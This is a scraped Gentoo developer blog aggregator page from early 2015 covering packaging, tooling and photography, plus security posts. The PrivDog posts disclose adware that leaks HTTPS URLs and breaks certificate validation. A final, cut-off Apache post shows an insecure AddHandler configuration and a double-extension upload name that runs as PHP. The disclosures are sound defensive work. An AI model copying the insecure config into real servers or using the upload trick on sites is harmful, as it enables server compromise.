Gentoo Logo
Gentoo Logo Side
Gentoo Spaceship

Contributors:
. Aaron W. Swenson
. Agostino Sarubbo
. Alec Warner
. Alex Alexander
. Alex Legler
. Alexey Shvetsov
. Alexis Ballier
. Alexys Jacob
. Amadeusz Żołnowski
. Andreas K. Hüttel
. Andreas Proschofsky
. Anthony Basile
. Arun Raghavan
. Bernard Cafarelli
. Bjarke Istrup Pedersen
. Brent Baude
. Brian Harring
. Christian Ruppert
. Chí-Thanh Christopher Nguyễn
. Daniel Gryniewicz
. David Abbott
. Denis Dupeyron
. Detlev Casanova
. Diego E. Pettenò
. Domen Kožar
. Donnie Berkholz
. Doug Goldstein
. Eray Aslan
. Fabio Erculiani
. Gentoo Haskell Herd
. Gentoo Monthly Newsletter
. Gentoo News
. Gilles Dartiguelongue
. Greg KH
. Hanno Böck
. Hans de Graaff
. Ian Whyman
. Ioannis Aslanidis
. Jan Kundrát
. Jason Donenfeld
. Jeffrey Gardner
. Jeremy Olexa
. Joachim Bartosik
. Johannes Huber
. Jonathan Callen
. Jorge Manuel B. S. Vicetto
. Joseph Jezak
. Kenneth Prugh
. Kristian Fiskerstrand
. Lance Albertson
. Liam McLoughlin
. LinuxCrazy Podcasts
. Luca Barbato
. Luis Francisco Araujo
. Mark Loeser
. Markos Chandras
. Mart Raudsepp
. Matt Turner
. Matthew Marlowe
. Matthew Thode
. Matti Bickel
. Michael Palimaka
. Michal Hrusecky
. Michał Górny
. Mike Doty
. Mike Gilbert
. Mike Pagano
. Nathan Zachary
. Ned Ludd
. Nirbheek Chauhan
. Pacho Ramos
. Patrick Kursawe
. Patrick Lauer
. Patrick McLean
. Pavlos Ratis
. Paweł Hajdan, Jr.
. Petteri Räty
. Piotr Jaroszyński
. Rafael Goncalves Martins
. Raúl Porcel
. Remi Cardona
. Richard Freeman
. Robin Johnson
. Ryan Hill
. Sean Amoss
. Sebastian Pipping
. Steev Klimaszewski
. Stratos Psomadakis
. Sune Kloppenborg Jeppesen
. Sven Vermeulen
. Sven Wegener
. Thomas Kahle
. Tiziano Müller
. Tobias Heinlein
. Tobias Klausmann
. Tom Wijsman
. Tomáš Chvátal
. Vikraman Choudhury
. Vlastimil Babka
. Zack Medico

Last updated:
March 06, 2015, 05:04 UTC

Disclaimer:
Views expressed in the content published here do not necessarily represent the views of Gentoo Linux or the Gentoo Foundation.


Bugs? Comments? Suggestions? Contact us!

Powered by:
Planet Venus

Welcome to Gentoo Universe, an aggregation of weblog articles on all topics written by Gentoo developers. For a more refined aggregation of Gentoo-related topics only, you might be interested in Planet Gentoo.

March 05, 2015
Paweł Hajdan, Jr. a.k.a. phajdan.jr (homepage, bugs)

I've been occasionally hitting frustrating issues with bash history getting lost after a crash. Then I found this great blog post about keeping bash history in sync on disk and between multiple terminals.

tl;dr is to use "shopt -s histappend" and PROMPT_COMMAND="${PROMPT_COMMAND};history -a"

The first is usually default, and results in sane behavior when you have multiple bash sessions at the same time. Now the second one ("history -a") is really useful to flush the history to disk in case of crashes.

I'm happy to announce that both are now default in Gentoo! Please see bug #517342 for reference.

February 27, 2015
Diego E. Pettenò a.k.a. flameeyes (homepage, bugs)
Sometimes "best" does not mean "better" (February 27, 2015, 19:37 UTC)

Please bear with me, this post will start as ramblings of a photography nerd who's not really very good at photography, but will move on to talk of more general technical discussions.

I recently had a discussion on Google+ about a camera lens that I bought recently — the Tamron 16-300. I like the lens, or I wouldn't have bought it, but the discussion was about the fact that the specs of the lens are at best mediocre, and possibly worse than other cheaper lenses.

It is true, a lens that spaces between f/3.5 and f/6.3 is not exactly a super-duper lens; it means that it can't take pictures in low-light conditions unless you give up on quality (bring ISO up) or use a flash. I was also suggested just before that the Canon 24-105 f/4L which is according to many the best lens of its kind. But that's not a better lens for me.

The reason why I say this is that I have considered the best lenses ever and have turned many down for various issues — the most common of which is, of course, price; I'm not good enough as a photographer to desire to spend over ten grands on gear every year. The Tamron I bought is, in my opinion, the better one for the space I was trying to fill, so let's try to find what space I was trying to fill first.

First of all, I don't have professional gear; I'm still shooting with a three years old Canon EOS 600D (Rebel T3i for the Americans), a so-called prosumer camera with a cropped sensor. I have over time bought a few pieces of glass, but the one I used the most has definitely been the Canon 50mm f/1.4 which sounded expensive at the time and now sounds almost cheap in comparison — since this is a cropped sensor the lens is actually an 80mm, which is a good portrait length for mugshots and has its use for parties and conferences.

This lens turns out to be mostly useless in museums though, and in general in enclosed spaces. And for big panoramas. For that I wanted a wide-angle lens and I bought a Tokina 11-16mm f/2.8 which is fast enough to shoot within buildings, even though it has a bit of chromatic aberration when shooting at maximum aperture.

Yes I know it's getting boring, bear with me a little longer.

So what is missing here is a lens for general pictures of a party that is not as close-up as the 50mm (you can get something akin to the actual 50mm with a 28mm) and something to take pictures at a distance. For those I have been using the kit lenses, the cheap 18-55mm and the 55-250mm — neither version is, as far as I can tell, still on the market; they have been replaced by actually decent versions comparatively, especially the 18-55mm STM.

Okay nobody but the photographers – who already know this – care about these details, so in short what gives? Well, I wanted to replace the two kit lenses with one versatile lens. The idea is that if I'm, say, at Muir Woods I'd rather not keep switching between the 50mm and the 11-16mm lenses, especially under the trees, with the risk of having dirt hitting the mirror or the sensor. I did it that one time, but I found it very inconvenient, and thus why I was looking for a zoom lens that would not make me bankrupt.

The Tamron is a decent lens. I've paid some €700 for it and a couple of (good) filters (UV and CP), which is not cheap but does not ruin me (remember I paid $600/month for the tinderbox, and that stopped now). Its specs are not stellar, and especially at 300mm f/6.3 is indeed a little too slow, there is some CA when running at 16mm too, but not bad enough. It pays of in terms of opportunity: in many cases I'm not setting out to take pictures of something in particular, I'm just rather going somewhere and bringing the camera with me and when I want to take a picture I may not know of what at first… if I have the wrong lens on, I may no be able to take a picture quickly enough; if I did not bring the right lens, I would not be able to take a picture at all. With a versatile zoom lens as my default-on, I can just take the camera out and shoot, even if it's not perfect — if I want to make it perfect I can put on the good lens.

Again, I could have saved a few more months and bought a more expensive lens, the "best" lens — but there are other things to consider: since I did have this lens I was able to take some pictures of a RC car race near Mission College, without having to find space to switch lenses between the whole track pictures and the cars details. I also would not be sure that I'd be bringing a lens that's over $1k alone around with me when not sure where I'm going; sure the rest of the lenses together already build up to that number, but they are also less conspicuous — the only one that is actually bigger than someone's hand is the Tokina.

This has also another side effect: it seems like many places in California have a "no professional photography without permission" rule, including Stanford University. The way "professional photography" gets defined is by the size of one's lens (the joke about sizes counting is old, get over it), namely if the lens does not fit in your hands it is counted as "professional". By that rule, the Tamron lens is not a professional one, while the suggested Canon 24-105 would be.

Cutting finally down to the chase, the point of the episode I recounted is that there are many other reasons beside the technical specs, for which decisions are made. The same discussions I heard about the bad specs of the lenses I was looking for reminded me of the discussions I had before when people insisted that there are no reasons for tablets, because we have laptops (for the 10") and smartphones (for the 7"), or about using a convenient airline rather than one that has better planes, or… you get the gist, right?

The same is true when people try to discuss Free Software or Open Source in just terms of technical superiority. It is probably true, but that does not always make it a good choice by itself, there are other considerations - hardware support used to be the main concern, nowadays UI and UX seems to be the biggest, but this does not mean it's limited to those.

This is similar in point to the story of Jessica as SwiftOnSecurity posted, but in this case I'm not even talking about people who don't know (and don't care to know) but rather about the fact that people have different priorities, and technical superiority is not always a priority.

Alexys Jacob a.k.a. ultrabug (homepage, bugs)
mongoDB 2.6.8, 2.4.13 & the upcoming 3.0.0 (February 27, 2015, 10:35 UTC)

I’m a bit slacking on those follow-up posts but with the upcoming mongoDB 3.x series and the recent new releases I guess it was about time I talked a bit about what was going on.

 mongodb-3.0.0_rcX

Thanks to the help of Tomas Mozes, we might get a release candidate version of the 3.0.0 version of mongoDB pretty soon in tree shall you want to test it on Gentoo. Feel free to contribute or give feedback in the bug, I’ll do my best to keep up.

What Tomas proposes matches what I had in mind so for now the plan is to :

  • split the mongo tools (mongodump/export etc) to a new package : dev-db/mongo-tools or app-admin/mongo-tools ?
  • split the MMS monitoring agent to its own package : app-admin/mms-monitoring-agent
  • have a look at the MMS backup agent and maybe propose its own package if someone is interested in this ?
  • after the first release, have a look at the MMS deployment automation to see how it could integrate with Gentoo

mongodb-2.6.8 & 2.4.13

Released 2 days ago, they are already on portage ! The 2.4.13 is mostly a security (SSL v3) and tiny backport release whereas the 2.6.8 fixes quite a bunch of bugs.

Please note that I will drop the 2.4.x releases when 3.0.0 hits the tree ! I will keep the latest 2.4.13 in my overlay if someone asks for it.

Service relaunch: archives.gentoo.org (February 27, 2015, 01:03 UTC)

The Gentoo Infrastructure team is proud to announce that we have re-engineered the mailing list archives, and re-launched it, back at archives.gentoo.org. The prior Mhonarc-based system had numerous problems, and a complete revamp was deemed the best forward solution to move forward with. The new system is powered by ElasticSearch (more features to come).

All existing URLs should either work directly, or redirect you to the new location for that content.

Major thanks to Alex Legler, for his development of this project.

Note that we're still doing some catchup on newer messages, but delays will drop to under 2 hours soon, with an eventual goal of under 30 minutes.

Please report problems to Bugzilla: Product Websites, Component Archives

February 25, 2015
Hanno Böck a.k.a. hanno (homepage, bugs)

Privdogtl;dr PrivDog will send webpage URLs you surf to a server owned by AdTrustMedia. This happened unencrypted in cleartext HTTP. This is true for both the version that is shipped with some Comodo products and the standalone version from the PrivDog webpage.

On Sunday I wrote here that the software PrivDog had a severe security issue that compromised the security of HTTPS connections. In the meantime PrivDog has published an advisory and an update for their software. I had a look at the updated version. While I haven't found any further obvious issues in the TLS certificate validation I found others that I find worrying.

Let me quickly recap what PrivDog is all about. The webpage claims: "PrivDog protects your privacy while browsing the web and more!" What PrivDog does technically is to detect ads it considers as bad and replace them with ads delivered by AdTrustMedia, the company behind PrivDog.

I had a look at the network traffic from a system using PrivDog. It sent some JSON-encoded data to the url http://ads.adtrustmedia.com/safecheck.php. The sent data looks like this:

{"method": "register_url", "url": "https:\/\/blog.hboeck.de\/serendipity_admin.php?serendipity[adminModule]=logout", "user_guid": "686F27D9580CF2CDA8F6D4843DC79BA1", "referrer": "https://blog.hboeck.de/serendipity_admin.php", "af": 661013, "bi": 661, "pv": "3.0.105.0", "ts": 1424914287827}
{"method": "register_url", "url": "https:\/\/blog.hboeck.de\/serendipity_admin.php", "user_guid": "686F27D9580CF2CDA8F6D4843DC79BA1", "referrer": "https://blog.hboeck.de/serendipity_admin.php", "af": 661013, "bi": 661, "pv": "3.0.105.0", "ts": 1424914313848}
{"method": "register_url", "url": "https:\/\/blog.hboeck.de\/serendipity_admin.php?serendipity[adminModule]=entries&serendipity[adminAction]=editSelect", "user_guid": "686F27D9580CF2CDA8F6D4843DC79BA1", "referrer": "https://blog.hboeck.de/serendipity_admin.php", "af": 661013, "bi": 661, "pv": "3.0.105.0", "ts": 1424914316235}


And from another try with the browser plugin variant shipped with Comodo Internet Security:

{"method":"register_url","url":"https:\\/\\/www.facebook.com\\/?_rdr","user_guid":"686F27D9580CF2CDA8F6D4843DC79BA1","referrer":""}
{"method":"register_url","url":"https:\\/\\/www.facebook.com\\/login.php?login_attempt=1","user_guid":"686F27D9580CF2CDA8F6D4843DC79BA1","referrer":"https:\\/\\/www.facebook.com\\/?_rdr"}


On a linux router or host system this could be tested with a command like tcpdump -A dst ads.adtrustmedia.com|grep register_url. (I was unable to do the same on the affected system with the windows version of tcpdump, I'm not sure why.)

Now here is the troubling part: The URLs I surf to are all sent to a server owned by AdTrustMedia. As you can see in this example these are HTTPS-protected URLs, some of them from the internal backend of my blog. In my tests all URLs the user surfed to were sent, sometimes with some delay, but not URLs of objects like iframes or images.

This is worrying for various reasons. First of all with this data AdTrustMedia could create a profile of users including all the webpages the user surfs to. Given that the company advertises this product as a privacy tool this is especially troubling, because quite obviously this harms your privacy.

This communication happened in clear text, even for URLs that are HTTPS. HTTPS does not protect metadata and a passive observer of the network traffic can always see which domains a user surfs to. But what HTTPS does encrypt is the exact URL a user is calling. Sometimes the URL can contain security sensitive data like session ids or security tokens. With PrivDog installed the HTTPS URL was no longer protected, because it was sent in cleartext through the net.

The TLS certificate validation issue was only present in the standalone version of PrivDog and not the version that is bundled with Comodo Internet Security as part of the Chromodo browser. However this new issue of sending URLs to an AdTrustMedia server was present in both the standalone and the bundled version.

I have asked PrivDog for a statement: "In accordance with our privacy policy all data sent is anonymous and we do not store any personally identifiable information. The API is utilized to help us prevent fraud of various types including click fraud which is a serious problem on the Internet. This allows us to identify automated bots and other threats. The data is also used to improve user experience and enables the system to deliver users an improved and more appropriate ad experience." They also said that they will update the configuration of clients to use HTTPS instead of HTTP to transmit the data.

PrivDog made further HTTP calls. Sometimes it fetched Javascript and iframes from the server trustedads.adtrustmedia.com. By manipulating these I was able to inject Javascript into webpages. However I have only experienced this with HTTP webpages. This by itself doesn't open up security issues, because an attacker able to control network traffic is already able to manipulate the content of HTTP webpages and can therefore inject JavaScript anyway. There are also other unencrypted HTTP requests to AdTrustMedia servers transmitting JSON data where I don't know what their exact meaning is.

February 24, 2015
Diego E. Pettenò a.k.a. flameeyes (homepage, bugs)
TG4: Tinderbox Generation 4 (February 24, 2015, 21:08 UTC)

Everybody's a critic: the first comment I received when I showed other Gentoo developers my previous post about the tinderbox was a question on whether I would be using pkgcore for the new generation tinderbox. If you have understood what my blog post was about, you probably understand why I was not happy about such a question.

I thought the blog post made it very clear that my focus right now is not to change the way the tinderbox runs but the way the reporting pipeline works. This is the same problem as 2009: generating build logs is easy, sifting through them is not. At first I thought this was hard just for me, but the fact that GSoC attracted multiple people interested in doing continuous build, but not one interested in logmining showed me this is just a hard problem.

The approach I took last time, with what I'll start calling TG3 (Tinderbox Generation 3), was to: highlight the error/warning messages; provide a list of build logs for which a problem was identified (without caring much for which kind of problem), and just showing up broken builds or broken tests in the interface. This was easy to build up, and to a point to use, but it had a lots of drawbacks.

Major drawbacks in that UI is that it relies on manual work to identify open bugs for the package (and thus make sure not to report duplicate bugs), and on my own memory not to report the same issue multiple time, if the bug was closed by some child as NEEDINFO.

I don't have my graphic tablet with me to draw a mock of what I have in mind yet, but I can throw in some of the things I've been thinking of:

  • Being able to tell what problem or problems a particular build is about. It's easy to tell whether a build log is just a build failure or a test failure, but what if instead it has three or four different warning conditions? Being able to tell which ones have been found and having a single-click bug filing system would be a good start.
  • Keep in mind the bugs filed against a package. This is important because sometimes a build log is just a repeat of something filed already; it may be that it failed multiple times since you started a reporting run, so it might be better to show that easily.
  • Related, it should collapse failures for packages so not to repeat the same package multiple times on the page. Say you look at the build failures every day or two, you don't care if the same package failed 20 times, especially if the logs report the same error. Finding out whether the error messages are the same is tricky, but at least you can collapse the multiple logs in a single log per package, so you don't need to skip it over and over again.
  • Again related, it should keep track of which logs have been read and which weren't. It's going to be tricky if the app is made multi-user, but at least a starting point needs to be there.
  • It should show the three most recent bugs open for the package (and a count of how many other open bugs) so that if the bug was filed by someone else, it does not need to be filed again. Bonus points for showing the few most recently reported closed bugs too.

You can tell already that this is a considerably more complex interface than the one I used before. I expect it'll take some work with JavaScript at the very least, so I may end up doing it with AngularJS and Go mostly because that's what I need to learn at work as well, don't get me started. At least I don't expect I'll be doing it in Polymer but I won't exclude that just yet.

Why do I spend this much time thinking and talking (and soon writing) about UI? Because I think this is the current bottleneck to scale up the amount of analysis of Gentoo's quality. Running a tinderbox is getting cheaper — there are plenty of dedicated server offers that are considerably cheaper than what I paid for hosting Excelsior, let alone the initial investment in it. And this is without going to look again at the possible costs of running them on GCE or AWS at request.

Three years ago, my choice of a physical server in my hands was easier to justify than now, with 4-core HT servers with 48GB of RAM starting at €40/month — while I/O is still the limiting factor, with that much RAM it's well possible to have one tinderbox building fully in tmpfs, and just run a separate server for a second instance, rather than sharing multiple instances.

And even if GCE/AWS instances that are charged for time running are not exactly interesting for continuous build systems, having a cloud image that can be instructed to start running a tinderbox with a fixed set of packages, say all the reverse dependencies of libav, would make it possible to run explicit tests for code that is known to be fragile, while not pausing the main tinderbox.

Finally, there are different ideas of how we should be testing packages: all options enabled, all options disabled, multilib or not, hardened or not, one package at a time, all packages together… they can all share the same exact logmining pipeline, as all it needs is the emerge --info output, and the log itself, which can have markers for known issues to look out for or not. And then you can build the packages however you desire, as long as you can submit them there.

Now my idea is not to just build this for myself and run analysis over all the people who want to submit the build logs, because that would be just about as crazy. But I think it would be okay to have a shared instance for Gentoo developers to submit build logs from their own personal instances, if they want to, and then have them look at their own accounts only. It's not going to be my first target but I'll keep that in mind when I start my mocks and implementations, because I think it might prove successful.

February 23, 2015
Jan Kundrát a.k.a. jkt (homepage, bugs)
Trojita 0.5 is released (February 23, 2015, 10:03 UTC)

Hi all,
we are pleased to announce version 0.5 of Trojitá, a fast Qt IMAP e-mail client. More than 500 changes went in since the previous release, so the following list highlights just a few of them:

  • Trojitá can now be invoked with a mailto: URL (RFC 6068) on the command line for composing a new email.
  • Messages can be forwarded as attachments (support for inline forwarding is planned).
  • Passwords can be remembered in a secure, encrypted storage via QtKeychain.
  • E-mails with attachments are decorated with a paperclip icon in the overview.
  • Better rendering of e-mails with extraordinary MIME structure.
  • By default, only one instance is kept running, and can be controlled via D-Bus.
  • Trojitá now provides better error reporting, and can reconnect on network failures automatically.
  • The network state (Offline, Expensive Connection or Free Access) will be remembered across sessions.
  • When replying, it is now possible to retroactively change the reply type (Private Reply, Reply to All but Me, Reply to All, Reply to Mailing List, Handpicked).
  • When searching in a message, Trojitá will scroll to the current match.
  • Attachment preview for quick access to the enclosed files.
  • The mark-message-read-after-X-seconds setting is now configurable.
  • The IMAP refresh interval is now configurable.
  • Speed and memory consumption improvements.
  • Miscellaneous IMAP improvements.
  • Various fixes and improvements.
  • We have increased our test coverage, and are now making use of an improved Continuous Integration setup with pre-commit patch testing.

This release has been tagged in git as "v0.5". You can also download a tarball (GPG signature). Prebuilt binaries for multiple distributions are available via the OBS, and so is a Windows installer.

We would like to thank Karan Luthra and Stephan Platz for their efforts during Google Summer of Code 2014.

The Trojitá developers

  • Jan Kundrát
  • Pali Rohár
  • Dan Chapman
  • Thomas Lübking
  • Stephan Platz
  • Boren Zhang
  • Karan Luthra
  • Caspar Schutijser
  • Lasse Liehu
  • Michael Hall
  • Toby Chen
  • Niklas Wenzel
  • Marko Käning
  • Bruno Meneguele
  • Yuri Chornoivan
  • Tomáš Chvátal
  • Thor Nuno Helge Gomes Hultberg
  • Safa Alfulaij
  • Pavel Sedlák
  • Matthias Klumpp
  • Luke Dashjr
  • Jai Luthra
  • Illya Kovalevskyy
  • Edward Hades
  • Dimitrios Glentadakis
  • Andreas Sturmlechner
  • Alexander Zabolotskikh

Diego E. Pettenò a.k.a. flameeyes (homepage, bugs)
The tinderbox is dead, long live the tinderbox (February 23, 2015, 03:24 UTC)

I announced it last November and now it became reality: the Tinderbox is no more, in hardware as well as software. Excelsior was taken out of the Hurricane Electric facility in Fremont this past Monday, just before I left for SCALE13x.

Originally the box was hosted by my then-employer, but as of last year, to allow more people to have access to is working, I had it moved to my own rented cabinet, at a figure of $600/month. Not chump change, but it was okay for a while; unfortunately the cost sharing option that was supposed to happen did not happen, and about an year later those $7200 do not feel like a good choice, and this is without delving into the whole insulting behavior of a fellow developer.

Right now the server is lying on the floor of an office in the Mountain View campus of my (current) employer. The future of the hardware is uncertain right now, but it's more likely than not going to be donated to Gentoo Foundation (minus the HDDs for obvious opsec). I'm likely going to rent a dedicated server of my own for development and testing, as even though they would be less powerful than Excelsior, they would be massively cheaper at €40/month.

The question becomes what we want to do with the idea of a tinderbox — it seems like after I announced the demise people would get together to fix it once and for all, but four months later there is nothing to show that. After speaking with other developers at SCaLE, and realizing I'm probably the only one with enough domain knowledge of the problems I tackled, at this point, I decided it's time for me to stop running a tinderbox and instead design one.

I'm going to write a few more blog posts to get into the nitty-gritty details of what I plan on doing, but I would like to provide at least a high-level idea of what I'm going to change drastically in the next iteration.

The first difference will be the target execution environment. When I wrote the tinderbox analysis scripts I designed them to run in a mostly sealed system. Because the tinderbox was running at someone else's cabinet, within its management network, I decided I would not provide any direct access to either the tinderbox container nor the app that would mangle that data. This is why the storage for both the metadata and the logs was Amazon: pushing the data out was easy and did not require me to give access to the system to anyone else.

In the new design this will not be important — not only because it'll be designed to push the data directly into Bugzilla, but more importantly because I'm not going to run a tinderbox in such an environment. Well, admittedly I'm just not going to run a tinderbox ever again, and will just build the code to do so, but the whole point is that I won't keep that restriction on to begin with.

And since the data store now is only temporary, I don't think it's worth over-optimizing for performance. While I originally considered and dropped the option of storing the logs in PostgreSQL for performance reasons, now this is unlikely to be a problem. Even if the queries would take seconds, it's not like this is going to be a deal breaker for an app with a single user. Even more importantly, the time taken to create the bug on the Bugzilla side is likely going to overshadow any database inefficiency.

The part that I've still got some doubts about is how to push the data from the tinderbox instance to the collector (which may or may not be the webapp that opens the bugs too.) Right now the tinderbox does some analysis through bashrc, leaving warnings in the log — the log is then sent to the collector through -chewing gum and saliva- tar and netcat (yes, really) to maintain one single piece of metadata: the filename.

I would like to be able to collect some metadata on the tinderbox side (namely, emerge --info, which before was cached manually) and send it down to the collector. But adding this much logic is tricky, as the tinderbox should still operate with most of the operating system busted. My original napkin plan involved having the agent written in Go, using Apache Thrift to communicate to the main app, probably written in Django or similar.

The reason why I'm saying that Go would be a good fit is because of one piece of its design I do not like (in the general use case) at all: the static compilation. A Go binary will not break during a system upgrade of any runtime, because it has no runtime; which is in my opinion a bad idea for a piece of desktop or server software, but it's a godsend in this particular environment.

But the reason for which I was considering Thrift was I didn't want to look into XML-RPC or JSON-RPC. But then again, Bugzilla supports only those two, and my main concern (the size of the log files) would still be a problem when attaching them to Bugzilla just as much. Since Thrift would require me to package it for Gentoo (seems like nobody did yet), while JSON-RPC is already supported in Go, I think it might be a better idea to stick with the JSON. Unfortunately Go does not support UTF-7 which would make escaping binary data much easier.

Now what remains a problem is filing the bug and attaching the log to Bugzilla. If I were to write that part of the app in Python, it would be just a matter of using the pybugz libraries to handle it. But with JSON-RPC it should be fairly easy to implement support for it from scratch (unlike XML-RPC) so maybe it's worth just doing the whole thing in Go, and reduce the proliferation of languages in use for such a project.

Python will remain in use for the tinderbox runner. Actually if anything I would like to remove the bash wrapper I've written and do the generation and selection of which packages to build in Python. It would also be nice if it could handle the USE mangling by itself, but that's difficult due to the sad conflicting requirements of the tree.

But this is enough details for the moment; I'll go back to thinking the implementation through and add more details about that as I get to them.

Hanno Böck a.k.a. hanno (homepage, bugs)
Software Privdog worse than Superfish (February 23, 2015, 00:27 UTC)

Privdogtl;dr There is a software called Privdog. It totally breaks HTTPS security in a similar way as Superfish.

In case you haven't heard it the past days an Adware called Superfish made headlines. It was preinstalled on Lenovo laptops and it is bad: It totally breaks the security of HTTPS connections. The story became bigger when it became clear that a lot of other software packages were using the same technology Komodia with the same security risk.

What Superfish and other tools do is that it intercepts encrypted HTTPS traffic to insert Advertising on webpages. It does so by breaking the HTTPS encryption with a Man-in-the-Middle-attack, which is possible because it installs its own certificate into the operating system.

A number of people gathered in a chatroom and we noted a thread on Hacker News where someone asked whether a tool called PrivDog is like Superfish. PrivDog's functionality is to replace advertising in web pages with it's own advertising "from trusted sources". That by itself already sounds weird even without any security issues.

A quick analysis shows that it doesn't have the same flaw as Superfish, but it has another one which arguably is even bigger. While Superfish used the same certificate and key on all hosts PrivDog recreates a key/cert on every installation. However here comes the big flaw: PrivDog will intercept every certificate and replace it with one signed by its root key. And that means also certificates that weren't valid in the first place. It will turn your Browser into one that just accepts every HTTPS certificate out there, whether it's been signed by a certificate authority or not. We're still trying to figure out the details, but it looks pretty bad. (with some trickery you can do something similar on Superfish/Komodia, too)

There are some things that are completely weird. When one surfs to a webpage that has a self-signed certificate (really self-signed, not signed by an unknown CA) it adds another self-signed cert with 512 bit RSA into the root certificate store of Windows. All other certs get replaced by 1024 bit RSA certs signed by a locally created PrivDog CA.

Certificate interceptionUS-CERT writes: "Adtrustmedia PrivDog is promoted by the Comodo Group, which is an organization that offers SSL certificates and authentication solutions." A variant of PrivDog that is not affected by this issue is shipped with products produced by Comodo (see below). This makes this case especially interesting because Comodo itself is a certificate authority (they had issues before). As ACLU technologist Christopher Soghoian points out on Twitter the founder of PrivDog is the CEO of Comodo. (See this blog post.)

We will try to collect information on this and other simliar software in a Wiki on Github. Discussions also happen on irc.ringoflightning.net #kekmodia.)

Thanks to Filippo, slipstream / raylee and others for all the analysis that has happened on this issue.

Update/Clarification: The dangerous TLS interception behaviour is part of the latest version of PrivDog 3.0.96.0, which can be downloaded from the PrivDog webpage. Comodo Internet Security bundles an earlier version of PrivDog that works with a browser extension, so it is not directly vulnerable to this threat. According to online sources PrivDog 3.0.96.0 was released in December 2014 and changed the TLS interception technology.

Update 2: Privdog published an Advisory.

February 21, 2015
Sebastian Pipping a.k.a. sping (homepage, bugs)

Hi!

On a rather young Gentoo setup of mine I ran into SSLV3_ALERT_HANDSHAKE_FAILURE from rss2email.
Plain Python showed it, too:

# python -c "import urllib2; \
    urllib2.urlopen('https://twitrss.me/twitter_user_to_rss/?user=...')" \
    |& tail -n 1
urllib2.URLError: <urlopen error [SSL: SSLV3_ALERT_HANDSHAKE_FAILURE] \
    sslv3 alert handshake failure (_ssl.c:581)>

On other machines this yields

urllib2.HTTPError: HTTP Error 403: Forbidden

instead.

It turned out I overlooked USE="bindist ..." in /etc/portage/make.conf which is sitting there by default.
On OpenSSL, bindist disables elliptic curve support. So that is where the SSLV3_ALERT_HANDSHAKE_FAILURE came from.

February 20, 2015
Diego E. Pettenò a.k.a. flameeyes (homepage, bugs)
Code memes, an unsolved problem (February 20, 2015, 20:35 UTC)

I'll start the post by pointing out that my use of the word meme will follow relatively closely the original definition provided by Dawkins (hate him, love him, or find him a prat that has sometimes good ideas) in The Selfish Gene rather than the more modern usage of "standard image template with similar text on it."

The reason is that I really need that definition to describe what I see happening often in code: the copy-pasting of snippets, or concepts, across projects, and projects, and projects, mutating slightly in some cases because of coding style rules and preferences.

This is particularly true when you're dealing with frameworks, such as Rails and Autotools; the obvious reason for that is that most people will strive for consistency with someone else — if they try themselves, they might make a mistake, but someone else already did the work for them, so why not use the same code? Or a very slightly different one just to suit their tastes.

Generally speaking, consistency is a good thing. For instance if I can be guaranteed that a given piece of code will always follow the same structure throughout a codebase I can make it easier on me to mutate the code base if, as an example, a function call loses one of its parameters. But when you're maintaining a (semi-)public framework, you no longer have control over the whole codebase, and that's where the trouble starts.

As you no longer have control over your users, bad code memes are going to ruin your day for years: the moment when one influential user finds a way to work around a bug implement a nice trick, their meme will live on for years, and breaking it is going to be just painful. This is why Autotools-based build systems suck in many cases: they all copied old bad memes from another build system and they stuck around. Okay, there is a separate issue of people deciding to break all memes and creating something that barely works and will break at the first change in autoconf or automake, but that's beside my current point.

So when people started adding AC_CANONICAL_TARGET the result was an uphill battle to get people to drop it. It's not like it's a big problem for it to be there, it just makes the build system bloated, and it's one of a thousand cuts that make Autotools so despised. I'm using this as an example, but there are plenty of other memes in autotools that are worse, breaking compatibility, or cross-compilation, or the maintainers only know what.

This is not an easy corner to get out of, adding warnings about the use of deprecated features can help, but sometimes it's not as simple, because it's not a feature being used, it's the structure being the problem, which you can't easily (or at all) warn on. So what do you do?

If your framework is internal to an organisation, a company or a project, your best option is to make sure that there are no pieces of code hanging around that uses the wrong paradigm. It's easy to say "here is the best practices piece of code, follow that, not the bad examples" — but people don't work that way, they will be looking on a search engine (or grep) for what they need done, and find the myriad bad examples to follow instead.

When your framework is open to the public and is used by people all around the world, well, there isn't much you can do about it, beside being proactive and pointing out the bad examples and provide solutions to them that people can reference. This was the reason why I started Autotools Mythbuster, especially as a series of blog posts.

You could start breaking the bad code, but it would probably be a bad move for PR, given that people will complain loudly that your software is broken (see the multiple API breakages in libav/ffmpeg). Even if you were able to provide patches to all the broken software out there, it's extremely unlikely that it'll be seen as a good move, and it might make things worse if there is no clear backward compatibility with the new code, as then you'll end up with the bad code and the good code wrapped around compatibility checks.

I don't have a clean solution, unfortunately. My approach is fix and document, but it's not always possible and it takes much more time than most people have to spare. It's sad, but it's the nature of software source code.

February 18, 2015
Arun Raghavan a.k.a. ford_prefect (homepage, bugs)
Reviewing moved files with git (February 18, 2015, 08:29 UTC)

This might be a well-known trick already, but just in case it’s not…

Reviewing a patch can be a bit painful when a file that has been changed and moved or renamed at one go (and there can be perfectly valid reasons for doing this). A nice thing about git is that you can reference files in an arbitrary tree while using git diff, so reviewing such changes can become easier if you do something like this:

$ git am 0001-the-thing-I-need-to-review.patch
$ git diff HEAD^:old/path/to/file.c new/path/to/file.c

This just references file.c in its old path, which is available in the commit before HEAD, and compares it to the file at the new path in the patch you just merged.

Of course, you can also use this to diff a file at some arbitrary point in the past, or in some arbitrary branch, with the same file at the current HEAD or any other point.

Hopefully this is helpful to someone out there!

Update: As Alex Elsayed points out in the comments, git diff -M/-C can be used to similar effect. The above example, for example, could be written as:

$ git am 0001-the-thing-I-need-to-review.patch
$ git show -C

February 17, 2015
Denis Dupeyron a.k.a. calchan (homepage, bugs)
Google Summer of Code 2015 (February 17, 2015, 04:47 UTC)

This is a quick informational message about GSoC 2015.

The Gentoo Foundation is in the process of applying to GSoC 2015 as an organization. This is the 10th year we’ll participate to this very successful and exciting program.

Right now, we need you to propose project ideas. You do not need to be a developer to propose an idea. First, open this link in a new tab/window. Change the title My_new_idea in the URL to the actual title, load the page again, fill in all the information and save the article. Then, edit the ideas page and include a link to it. If you need any help with this, or advice regarding the description or your idea, come talk to us in #gentoo-soc on Freenode.

Thanks.

February 15, 2015
Sebastian Pipping a.k.a. sping (homepage, bugs)
Apache AddHandler madness all over the place (February 15, 2015, 21:44 UTC)

Hi!

A friend of mine ran into known (though not well-known) security issues with Apache’s AddHandler directive.
Basically, Apache configuration like

# Avoid!
AddHandler php5-fcgi .php

applies to a file called evilupload.php.png, too. Yes.
Looking at the current Apache documentation, it should clearly say that AddHandler should not be used any more for security reasons.
That’s what I would expect. What I find as of 2015-02-15 looks different:

